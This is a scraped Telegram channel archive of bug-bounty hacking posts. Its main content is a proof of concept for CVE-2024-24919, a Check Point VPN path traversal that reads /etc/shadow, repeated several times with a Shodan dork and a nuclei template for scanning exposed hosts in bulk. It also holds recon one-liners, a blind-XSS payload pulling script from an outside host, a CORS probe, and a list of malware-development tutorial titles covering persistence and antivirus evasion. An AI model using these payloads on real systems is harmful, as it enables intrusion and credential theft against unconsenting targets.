Bug bounty Tips
Kanalga Telegram’da o‘tish
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish6 032
Obunachilar
+1224 soatlar
+717 kunlar
+32530 kunlar
Postlar arxiv
6 032
For this vulnerability, just type shodan
title:"Check Point" ssl:"target"
CVE-2024-24919
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#SSLVPN #BugBounty
6 032
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#0day #checkpoint
6 032
Repost from DailyData😍
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#0day #checkpoint
6 032
Check Point - Wrong Check Point (CVE-2024-24919)
Grabbed the ipaddress using shodan and then put it to nuclei code below
id: CVE-2024-24919
info:
name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
author: Addy
severity: High
metadata:
max-request: 1
vendor: checkpoint
tags: cve,cve2024,checkpoint
http:
- method: POST
path:
- "{{BaseURL}}/clients/MyCRL"
body: 'aCSHELL/../../../../../../../etc/shadow'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:"
- "cpep_user:"
- type: status
status:
- 200
https://t.co/YcKOC3DqZL
Follow t.me/bugbounty_tech6 032
Check Point - Wrong Check Point (CVE-2024-24919)
Grabbed the ipaddress using shodan and then put it to nuclei code below
id: CVE-2024-24919
info:
name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion
author: Addy
severity: High
metadata:
max-request: 1
vendor: checkpoint
tags: cve,cve2024,checkpoint
http:
- method: POST
path:
- "{{BaseURL}}/clients/MyCRL"
body: 'aCSHELL/../../../../../../../etc/shadow'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:"
- "cpep_user:"
- type: status
status:
- 200
https://t.co/YcKOC3DqZL
Follow t.me/bugbounty_tech6 032
Oneliner for Grabbing ip from Shodan
shodan search --fields ip_str,port 'http.title:"Check Point SSL Network Extender"' --separator ":" | sed 's/.$//' > file.txt6 032
if you want to grab the ip after ASN Record u can use this oneline
whois -h whois.radb.net -- '-i origin AS8983' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq -u > ipranges.txt && cat ipranges.txt | mapcidr -silent | dnsx -ptr -resp-only | sort -u > ptrrecords.txt && cat ptrrecords.txt | anew -q subs.txt6 032
Methodology one :
First step collect as much as subdomains you can.i use subfinder with my all api keys virustotal,censys,shodan etc no need many other tool for subdomains finding its enough with all api keys + crt.sh manual+automation
-recursive flag used for fetching domain of subdomains its called sub sub domains example amazon.amazoncloud.amazon.com many people miss this part and -all switch from its fetch all api from all sources with all api keys
subfinder -d google.com -all -recursive > subdomain.txt
This oneliner fetch all subdomains from crt.sh
curl -s https://crt.sh/\?q\=\amazon.com\&output\=json | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$'
Normaly people use httpx default command and they only filter subdomains with port 443 or 80 but many domains contains dashboard or control pannel and login pannel at 8080,8888,8000 port so always include these ports..
cat subdomains.txt | httpx-toolkit -ports 80,8080,8000,8888 -threads 200 > subdomains_alive.txt
For checking open ports i used naabu its very fast by this i can check the result of open ports and what service is running on that port is it contain any vulnerable version so i exploit that service thats why port enumeration is important
naabu -list subdomains.txt -c 50 -nmap-cli 'nmap -sV -sC' -o naabu-full.txt
And for Checking any hidden Directory and files i used dirsearch with onelist for all list that contains many directory and filess used in web and include only status code that one is important..by this you can find many senstive discloure of files and directory i dont use ffuf bcz its give result with lots of waste things and its also blocked by the domains for its fast bruteforcing..thats why i like dirsearch with colorfull and clean output and less errors.
dirsearch -l subdomains_alive.txt -i 200,204,403 -x 500,502,429 -R 5 --random-agent -t 50 -F -w /home/coffinxp/oneforall/onelistforallshort.txt -o directory.txt
Now for fetching all urls from archive from many source i used gau rather then wayback bcz it use many sources and its all passive you can use katana for active urls and anew with that files.after use uro to filter out duplicates params..
cat subdomains_alive.txt | gau > newparms.txt
cat newparms.txt | uro > filterparm.txt
And for js files that contains senstive keyss and pass i used grep command you can also fetch it by katana by -jc flag for active js endpoint.
cat filterparam.txt | grep ".js$" > jsfiles.txt
and for secret keys i used one liner secret finder or you can send it to nuclei custom secret finder that give clean result i will send u that.
cat jsfiles.txt | while read url; do python3 /home/coffinxp/SecretFinder/SecretFinder.py -i $url -o cli >> secret.txt; done
and then grep all keyss
cat secret.txt | grep aws
cat secret.txt | grep goole captcha
cat secret.txt | grep twilio
and in last i send all param to nuclei that contains all types of vulnerability with my custom templates i will share with you all soon after adding more..
before this if you want seperate vulnerability and find with any other tool for specially made for that purpose like for xss use dalfox,for openredirect use openredirex, for lfi use dotdotpwn & lfi suite..filter these with Gf pattren so you only get valid params for that vulnerability and send to nuclei with that specific vulnerability tags --tags xss
nuclei -list sorted_wordlist_100000.txt -t /home/coffinxp/Custom-Nuclei-Templates/
6 032
.Bug Hunting methodology
-------------------------------------------------------------------------
subfinder -d viator.com -all -recursive > subdomain.txt
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt
cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"
cat allurls.txt | grep -E "\.js$" >> js.txt
cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/
echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30
dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json
subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl
python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"
nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors
nuclei -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech
cat allurls.txt | gf lfi | nuclei -tags lfi
cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect
6 032
6 032
Malware development: persistence - part 1. Registry run keys. C++ example.
Malware development: persistence - part 2. Screensaver hijack. C++ example.
Malware development: persistence - part 3. COM DLL hijack.
Malware development: persistence - part 4. Windows services. Simple C++ example.
Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.
Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.
Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example.
Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++ example.
Malware AV evasion - part 9. Encrypt base64 encoded payload via RC4. C++ example.
Malware AV/VM evasion - part 10: anti-debugging. NtGlobalFlag. Simple C++ example.
Malware AV/VM evasion - part 11: encrypt payload via DES. Simple C++ example.
Malware AV/VM evasion - part 12: encrypt/decrypt payload via TEA. Simple C++ example.
Malware AV/VM evasion - part 13: encrypt/decrypt payload via Madryga. Simple C++ example.
Malware AV/VM evasion - part 14: encrypt/decrypt payload via A5/1. Bypass Kaspersky AV. Simple C++ example.
Malware AV/VM evasion - part 15: WinAPI GetModuleHandle implementation. Simple C++ example.
Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example.
Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example.
Malware AV/VM evasion - part 18: encrypt/decrypt payload via modular multiplication-based block cipher. Simple C++ example.
Malware development: persistence - part 22. Windows Setup. Simple C++ example.
Malware and cryptography 1: encrypt/decrypt payload via RC5. Simple C++ example.
Malware and cryptography 20: encrypt/decrypt payload via Skipjack. Simple C++ example.
Malware and cryptography 21: encrypt/decrypt payload via WAKE. Simple C++ example.
Malware development: persistence - part 23. LNK files. Simple Powershell example.
Malware development: persistence - part 24. StartupApproved. Simple C example.
Malware and cryptography 22: encrypt/decrypt payload via XTEA. Simple C++ example.
Malware and cryptography 23: encrypt/decrypt file via TEA. Simple C/C++ example.
Malware and cryptography 24: encrypt/decrypt file via Madryga. Simple C/C++ example.
Malware and cryptography 25: encrypt/decrypt payload via RC6. Simple C/C++ example.
Malware AV/VM evasion - part 15: WinAPI GetModuleHandle implementation. Simple C++ example.
Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example.
Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example.
Malware AV/VM evasion - part 18: encrypt/decrypt payload via modular multiplication-based block cipher. Simple C++ example.
Malware development: persistence - part 22. Windows Setup. Simple C++ example.
Malware and cryptography 1: encrypt/decrypt payload via RC5. Simple C++ example.
Malware and cryptography 20: encrypt/decrypt payload via Skipjack. Simple C++ example.
Malware and cryptography 21: encrypt/decrypt payload via WAKE. Simple C++ example.
Credit: https://t.me/Devexploit
6 032
🧵 A Guide to Starting Your Bug Bounty Journey
1/ 🐞 Don't focus too much on CTFs. The bugs you find there rarely exist in real targets. CTFs are great for learning, but real-world hunting is a different game.
2/ 🏆 Avoid starting on platforms like HackerOne, Bugcrowd, or Intigriti. The competition is fierce, making it tough to find your first bug. Start with Vulnerability Disclosure Programs (VDPs) instead. You'll have a better chance and less discouragement.
3/ 🔍 Focus on one type of vulnerability at a time. IDOR is a great starting point. Master one attack vector before moving to the next, like SSRF, XSS, SSTI, or RCE. Specialization helps build strong skills.
4/ 💡 Be smart about where to inject your payloads. Tailor them to your target's tech stack. For APIs, use backend-specific payloads. Avoid generic payloads that don't match the target's technology.
5/ 📚 Read hacktivity on platforms like HackerOne. These are real bugs on real targets. It's one of the best ways to learn effective attack methods.
6/ 🛠️ Don't rely on default nuclei templates. Create custom ones to avoid duplicates. Customization can give you an edge.
7/ 🤝 Collaborate with experienced hackers. Learn from those who have already found vulnerabilities. Knowledge sharing is invaluable.
8/ 🐦 Join Twitter (or X). Top hackers share tons of valuable information there. Take notes, ask questions, and don't be shy. The worst that can happen is no response, and that's okay.
9/ 💸 Avoid paid tools as a beginner. First, learn the ropes. Once you start earning, consider investing in them. Smart investments come after gaining knowledge and experience.
10/ 🔍 Master Google dorking. It's a crucial skill for any hacker. The ability to find sensitive information through search engines is invaluable.
11/ 🛠️ Found an exploit on Google Hacking Database? Verify it! Ensure the target uses the relevant tech stack. Use Docker to replicate the environment and test the exploit on your local setup. This method sets apart pros from script kiddies.
12/ 🧠 Learn some coding. Understanding the technology you're hacking is essential. Each exploit is different, and knowing the tech helps you adapt your approach.
13/ 🔥 Success in bug bounties comes with hard work. Read source code, understand endpoints, and go beyond brute-forcing. Dedication and effort pay off. If you’re willing to put in the work, you can achieve significant success.
14/ 🌟 Remember, it's a marathon, not a sprint. With persistence and smart strategies, you can achieve your goals. If I can do it, so can you. Let's get to work! 🚀 #BugBounty #CyberSecurity #Hacking
